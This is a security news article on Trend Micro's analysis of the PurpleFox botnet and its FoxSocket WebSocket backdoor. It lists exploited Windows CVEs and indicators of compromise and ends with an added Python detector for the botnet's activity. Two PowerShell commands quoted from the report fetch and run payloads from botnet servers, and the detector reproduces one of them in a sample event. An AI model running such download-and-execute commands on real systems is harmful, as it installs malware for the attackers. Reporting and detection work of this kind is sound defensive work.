According to researchers, the new variant uses WebSockets to implement more secure bidirectional C2 communication, and its operators have incorporated new exploits and payloads. Trend Micro researchers have described the PurpleFox botnet's latest evolution, uncovering a new .NET backdoor, known as FoxSocket, that is closely linked to the PurpleFox operation.
Trend Micro reports that the fetched payload is a long script that comprises three privilege escalation components. These target Windows 7 to Windows 10 systems, but are limited to 64-bit systems only.
The flaws exploited by the latest PurpleFox variant are the following:
- Windows 7/Windows Server 2008 – CVE-2020-1054, CVE-2019-0808
- Windows 8/Windows Server 2012 – CVE-2019-1458
- Windows 10/Windows Server 2019 – CVE-2021-1732
In early iterations, the configuration parameters for deploying this backdoor contained only a small number of subdomains for contacting the C&C servers, which agrees with the creation date of the malicious domain advb9fyxlf2v[.]com; the latest iteration contains more.
“After selecting the appropriate vulnerability, it uses the PowerSploit module to reflectively load the embedded exploit bundle binary with the target vulnerability and an MSI command as arguments. As a failover, it uses the Tater module to launch the MSI command,” reads the analysis published by Trend Micro. “The goal is to install the MSI package as an admin without any user interaction.”
The list of WebSocket commands observed by Trend Micro is extensive, and although there are some discrepancies between different variants, the table below summarizes them.
PowerShell commands being executed:
- "cmd.exe" /c powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('hxxp[[:]]//18.104.22.168[[:]]17881/57BC9B7E.Png');MsiMake hxxp[[:]]//22.214.171.124[[:]]17881/0CFA042F.Png"
- "cmd.exe" /c powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http[:]//126.96.36.199[:]13405/57BC9B7E.Png');MsiMake http[:]//188.8.131.52[:]13405/0CFA042F.Png"
These commands download a malicious payload from the specified URLs, which are hosted on multiple compromised servers. These servers are part of the PurpleFox botnet, and most of them are located in China.
The fetched payload is a long script consisting of three components:
- Tater (Hot Potato – privilege escalation)
- PowerSploit (reflective loading of the exploit bundle)
- Embedded exploit bundle binary (privilege escalation)
Finally, the researchers concluded that PurpleFox's rootkit tools allow it to carry out its goals in a stealthier manner. They enable PurpleFox to persist on impacted systems and deliver more payloads to them. Trend Micro is still monitoring these new variants and their payloads. The new .NET WebSocket backdoor (dubbed FoxSocket and detected as Backdoor.MSIL.PURPLEFOX.AA) is being intensively monitored in order to learn more about this threat actor's aims and goals.
Indicators of compromise:
SHA-256
- 1dd5124b7ade65c5abe4b4c0e74441a41761207e430c0a563fc05d91aee226e0
- 51e7c574abc9c323b6ab257305b568cbfa898187309b6be75f94b69116687573
- 7edb974e451b6cfeb87bb741f2ce8fb2982e233ce37db90c70d57f15164b8ccd
- c0fee2c000f9caf6b49c73ebc6c84c9084ab1aec5d360b9b7dea6b3156f52acc
- d4626740bd53e9ae2cf524be4fa83fd6ba0f5692d2cb5f50b2af8232b4de2d0e
- d4f9a5f8543a91001a859a064b9b0082e633a09e7e23c5a1557bcf5fb59f284c
- f58e4985feba1658de9b25502c367d802aea9da87c01ba3ad38d2f861c44298e
Domain
- www.advb9fyxlf2v.com
- www2.advb9fyxlf2v.com
- www3.advb9fyxlf2v.com
- www4.advb9fyxlf2v.com
- www5.advb9fyxlf2v.com
- www6.advb9fyxlf2v.com
- www7.advb9fyxlf2v.com
- www8.advb9fyxlf2v.com
IP Address
- 184.108.40.206
- 220.127.116.11
- 18.104.22.168
- 22.214.171.124
- 126.96.36.199
- 188.8.131.52
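To turn the indicators above and the PowerShell download cradle listed earlier into something a detection engineer can run, here is an added example in Python (not Trend Micro's code and not code from the article). It parses the IoC block in the flattened form printed here, refangs the defanged URLs used in the article's command lines, flags the `IEX (New-Object Net.WebClient).DownloadString(...)` / `MsiMake` cradle in process-creation events, and matches listed domains, IPs and SHA-256 hashes against a few constructed, Sysmon-style JSON events. The event records and their field names (`ProcessCreate`, `DnsQuery`, `FileCreate`, `NetworkConnect`, `cmdline`, `qname`, `sha256`, `dst_ip`) are assumptions for illustration; the indicator values themselves are the ones the article lists.

```python
"""Parse the article's IoC list and scan constructed endpoint events for
PurpleFox / FoxSocket activity.  Added example, not the article's or
Trend Micro's code; the event records below are constructed for illustration."""
from __future__ import annotations

import re

# IoC block exactly as the article prints it (flattened, sections separated by dashes).
IOC_TEXT = """
SHA-256 1dd5124b7ade65c5abe4b4c0e74441a41761207e430c0a563fc05d91aee226e0 51e7c574abc9c323b6ab257305b568cbfa898187309b6be75f94b69116687573 7edb974e451b6cfeb87bb741f2ce8fb2982e233ce37db90c70d57f15164b8ccd c0fee2c000f9caf6b49c73ebc6c84c9084ab1aec5d360b9b7dea6b3156f52acc d4626740bd53e9ae2cf524be4fa83fd6ba0f5692d2cb5f50b2af8232b4de2d0e d4f9a5f8543a91001a859a064b9b0082e633a09e7e23c5a1557bcf5fb59f284c f58e4985feba1658de9b25502c367d802aea9da87c01ba3ad38d2f861c44298e
--------------------------------------------- Domain www.advb9fyxlf2v.com www2.advb9fyxlf2v.com www3.advb9fyxlf2v.com www4.advb9fyxlf2v.com www5.advb9fyxlf2v.com www6.advb9fyxlf2v.com www7.advb9fyxlf2v.com www8.advb9fyxlf2v.com
--------------------------------------------- IP Address 184.108.40.206 220.127.116.11 18.104.22.168 22.214.171.124 126.96.36.199 188.8.131.52
"""

HEX64 = re.compile(r"^[0-9a-f]{64}$", re.I)
IPV4 = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")
DOMAIN = re.compile(r"^(?:[a-z0-9-]+\.)+[a-z]{2,}$", re.I)
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)


def refang(text: str) -> str:
    """Undo the defanging used in the article: [.] -> ., [:] or [[:]] -> :, hxxp -> http."""
    text = text.replace("[.]", ".")
    text = re.sub(r"\[+:\]+", ":", text)
    return re.sub(r"\bhxxp", "http", text, flags=re.I)


def parse_iocs(text: str) -> dict[str, set[str]]:
    """Classify every whitespace-separated token by shape; labels and dashes fall through."""
    iocs: dict[str, set[str]] = {"sha256": set(), "domain": set(), "ip": set()}
    for raw in text.split():
        tok = refang(raw).strip(",;").lower()
        if HEX64.match(tok):
            iocs["sha256"].add(tok)
        elif IPV4.match(tok):
            iocs["ip"].add(tok)
        elif DOMAIN.match(tok):
            iocs["domain"].add(tok)
    return iocs


def cradle_indicators(cmdline: str) -> list[str]:
    """Name the traits of the article's PowerShell command line present in cmdline.
    Works on defanged strings copied from a report as well as on live log data."""
    c = refang(cmdline)
    checks = [
        ("powershell", r"\bpowershell(?:\.exe)?\b"),
        ("noprofile", r"(?<![\w-])-nop(?:rofile)?\b"),
        ("exec_bypass", r"-exec(?:utionpolicy)?\s+bypass\b"),
        ("iex_downloadstring", r"\bIEX\b.*\bNet\.WebClient\b.*\.DownloadString\("),
        ("msimake", r"\bMsiMake\b"),
        # the article's payloads are fetched from URLs ending in .Png
        ("script_disguised_as_image", r"DownloadString\(['\"]https?://[^'\"]+\.png['\"]"),
    ]
    return [name for name, pat in checks if re.search(pat, c, re.I)]


def scan_events(events: list[dict], iocs: dict[str, set[str]]) -> list[tuple[int, str, str]]:
    """Return (event id, reason, value) alerts for cradle behaviour and IoC matches."""
    alerts: list[tuple[int, str, str]] = []
    for ev in events:
        kind = ev.get("event")
        if kind == "ProcessCreate":
            cmd = ev.get("cmdline", "")
            hits = cradle_indicators(cmd)
            # -nop / -exec bypass alone are noisy; require the cradle or the MsiMake helper
            if "iex_downloadstring" in hits or "msimake" in hits:
                alerts.append((ev["id"], "powershell_download_cradle", ",".join(hits)))
            for host in URL_HOST.findall(refang(cmd)):
                if host.lower() in iocs["ip"] or host.lower() in iocs["domain"]:
                    alerts.append((ev["id"], "ioc_host_in_cmdline", host))
        elif kind == "DnsQuery":
            q = ev.get("qname", "").lower().rstrip(".")
            if q in iocs["domain"]:
                alerts.append((ev["id"], "ioc_domain", q))
        elif kind == "FileCreate":
            h = ev.get("sha256", "").lower()
            if h in iocs["sha256"]:
                alerts.append((ev["id"], "ioc_sha256", h))
        elif kind == "NetworkConnect":
            if ev.get("dst_ip") in iocs["ip"]:
                alerts.append((ev["id"], "ioc_ip", ev["dst_ip"]))
    return alerts


# Constructed Sysmon-style events (assumed field names); event 1 is the article's command line refanged.
SAMPLE_EVENTS = [
    {"id": 1, "event": "ProcessCreate", "image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": ("\"cmd.exe\" /c powershell -nop -exec bypass -c \"IEX (New-Object Net.WebClient)"
                 ".DownloadString('http://18.104.22.168:17881/57BC9B7E.Png');"
                 "MsiMake http://22.214.171.124:17881/0CFA042F.Png\"")},
    {"id": 2, "event": "ProcessCreate", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell -NoProfile -File C:\\scripts\\backup.ps1"},
    {"id": 3, "event": "DnsQuery", "qname": "www3.advb9fyxlf2v.com"},
    {"id": 4, "event": "DnsQuery", "qname": "update.microsoft.com"},
    {"id": 5, "event": "FileCreate", "sha256": "1dd5124b7ade65c5abe4b4c0e74441a41761207e430c0a563fc05d91aee226e0"},
    {"id": 6, "event": "NetworkConnect", "dst_ip": "18.104.22.168", "dst_port": 17881},
    {"id": 7, "event": "NetworkConnect", "dst_ip": "10.0.0.5", "dst_port": 443},
]

if __name__ == "__main__":
    for alert in scan_events(SAMPLE_EVENTS, parse_iocs(IOC_TEXT)):
        print(alert)
```

Event 2 shows why the cradle rule keys on `DownloadString` and `MsiMake` rather than on `-nop` or `-exec bypass`: an ordinary scheduled script trips the noisy flags but raises no alert. Refanging is applied before matching so the same functions accept indicators pasted straight from a report.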